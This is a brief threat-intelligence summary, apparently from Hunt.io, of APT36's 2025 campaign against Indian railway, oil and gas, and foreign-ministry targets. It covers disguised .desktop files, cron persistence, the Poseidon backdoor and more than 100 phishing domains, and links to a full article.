APT36 Expands Beyond Military New Attacks Hit Indian Railways, Oil & Government Systems

Key Takeaways

• APT36 has expanded its focus to include Indian railway systems, oil and gas infrastructure, and the Ministry of External Affairs.
• They use .desktop files disguised as PDF documents to execute scripts that download malware and establish persistence using cron jobs.
• Two attack variants were identified: one uses a single command and control server, while the other includes redundant servers for resiliency.
• The Poseidon backdoor, built on the Mythic framework and written in Go, is used to maintain access and support lateral movement.
• Hunt.io researchers discovered more than 100 phishing domains, many of which impersonated Indian government organizations and were hosted by AlexHost.
• The first phishing domains in this campaign were registered in early July 2025, with live infrastructure observed as of mid-July. This suggests ongoing and active targeting.

To read the complete article see: Link to Full Article